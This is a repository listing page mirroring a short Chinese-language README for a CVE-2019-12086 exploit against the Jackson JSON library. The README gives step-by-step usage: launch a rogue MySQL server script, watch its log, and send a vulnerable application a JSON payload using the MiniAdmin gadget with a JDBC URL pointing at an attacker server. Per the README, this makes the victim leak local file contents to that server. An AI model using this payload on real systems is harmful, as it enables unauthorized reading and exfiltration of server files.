https://github.com/al1ex/cve-2019-12086

jackson unserialize
https://github.com/al1ex/cve-2019-12086

Last synced: 3 months ago
JSON representation

jackson unserialize

• Host: GitHub
• URL: https://github.com/al1ex/cve-2019-12086
• Owner: Al1ex
• Created: 2020-05-22T17:10:10.000Z (about 6 years ago)
• Default Branch: master
• Last Pushed: 2022-11-16T08:58:40.000Z (over 3 years ago)
• Last Synced: 2025-03-25T05:08:03.053Z (about 1 year ago)
• Language: Python
• Size: 11.7 KB
• Stars: 1
• Watchers: 1
• Forks: 3
• Open Issues: 1
• Metadata Files:
  • Readme: README.md

Awesome Lists containing this project

README

          
# 文档说明

CVE-2019-12086

jackson unserialize

# 漏洞利用

1、启动恶意MySQL服务器： 

`python rogue_mysql_server.py`

2、在同一个目录下查看mysql.log：

`tail -f mysql.log`

3、向存在漏洞的应用发送如下json：

`["com.mysql.cj.jdbc.admin.MiniAdmin","jdbc:mysql://attacker_server:port/foo"]`

当jackson反序列化恶意json串后，会连接恶意MySQL服务器，被读取的文件内容会写入恶意服务器的mysql.log